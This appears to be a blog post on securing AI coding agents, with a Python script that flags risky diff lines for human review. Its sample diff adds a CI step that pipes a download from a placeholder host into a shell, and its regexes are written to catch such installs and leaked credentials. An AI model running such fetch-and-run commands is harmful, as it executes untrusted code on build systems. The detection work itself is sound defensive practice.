AI coding agents are getting useful enough that teams are letting them inspect repos, edit files, run commands, open pull requests, and sometimes talk to internal tools. That is a big productivity win — but it also changes the security model.

A normal developer workstation assumes the person at the keyboard understands context. An agent does not. It can follow instructions planted in a README or issue comment (prompt injection), execute a script it was told to run without judging the risk, leak environment variables and secrets into logs or tool output, or install a dependency that does more than its name suggests.

The practical answer is not "never use agents." The answer is: treat every agent session as an untrusted autonomous workload and give it the smallest workspace it needs.

This post is a concise checklist you can apply today.

At a high level, the safe pattern is simple: keep the agent inside a constrained workspace, collect logs and diffs, and put a human review gate before anything merges or deploys.
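As a concrete illustration of the review gate, here is a small diff checker added for this post (it is not code from the post itself or from any agent product). It reads a unified diff the agent produced and flags hunks a human must look at before anything merges: edits to CI or dependency files, commands that pipe a download into a shell, and added lines that look like credentials. The path list, the regexes and the sample diff are constructed for the example and are a starting point for a policy, not a complete one.

```python
import re
from dataclasses import dataclass

# Constructed sample: a unified diff an agent might emit. Not from any real repo.
SAMPLE_DIFF = """\
diff --git a/src/app.py b/src/app.py
--- a/src/app.py
+++ b/src/app.py
@@ -1,3 +1,4 @@
 import os
+API_KEY = "AKIAIOSFODNN7EXAMPLE"
 def main():
     print(os.environ)
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -10,2 +10,3 @@
       - run: pytest
+      - run: curl -sSL https://example.invalid/setup.sh | sh
diff --git a/README.md b/README.md
--- a/README.md
+++ b/README.md
@@ -1 +1,2 @@
 # Project
+Build notes.
"""


@dataclass(frozen=True)
class Finding:
    path: str
    line: str
    reason: str


# Hypothetical policy for this example: files whose edits always need a human.
SENSITIVE_PATH = re.compile(
    r"^(\.github/workflows/|\.gitlab-ci\.yml$|Dockerfile$|package\.json$"
    r"|requirements.*\.txt$|go\.mod$|Cargo\.toml$)"
)
# "curl ... | sh" style installs in added lines.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z|)sh\b")
# Two common credential shapes; extend with the patterns your org cares about.
AWS_ACCESS_KEY = re.compile(r"\bAKIA[0-9A-Z]{16}\b")
PRIVATE_KEY = re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----")


def review_diff(diff_text: str) -> list[Finding]:
    """Walk a unified diff and return everything that needs human review."""
    findings: list[Finding] = []
    path = "?"
    for raw in diff_text.splitlines():
        if raw.startswith("+++ "):
            # New-file header: record the path and check it against the policy.
            path = raw[4:].strip()
            if path.startswith("b/"):
                path = path[2:]
            if SENSITIVE_PATH.search(path):
                findings.append(Finding(path, raw, "edits a build/CI or dependency file"))
            continue
        if not raw.startswith("+") or raw.startswith("+++"):
            continue  # only added lines are inspected; context and removals are skipped
        added = raw[1:]
        if PIPE_TO_SHELL.search(added):
            findings.append(Finding(path, added.strip(), "pipes a download into a shell"))
        if AWS_ACCESS_KEY.search(added) or PRIVATE_KEY.search(added):
            findings.append(Finding(path, added.strip(), "adds what looks like a credential"))
    return findings


def gate(diff_text: str) -> str:
    """'auto' when nothing was flagged, otherwise 'human-review' (never auto-merge)."""
    return "auto" if not review_diff(diff_text) else "human-review"


if __name__ == "__main__":
    for f in review_diff(SAMPLE_DIFF):
        print(f"{f.path}: {f.reason}\n    {f.line}")
    print("decision:", gate(SAMPLE_DIFF))
```

Run it on the diff the agent leaves behind (for example `git diff origin/main...HEAD`) as the last step of the sandboxed session; any finding turns the change into a pull request that a person has to read, and an empty result still does not mean "merge", only that the cheap checks passed.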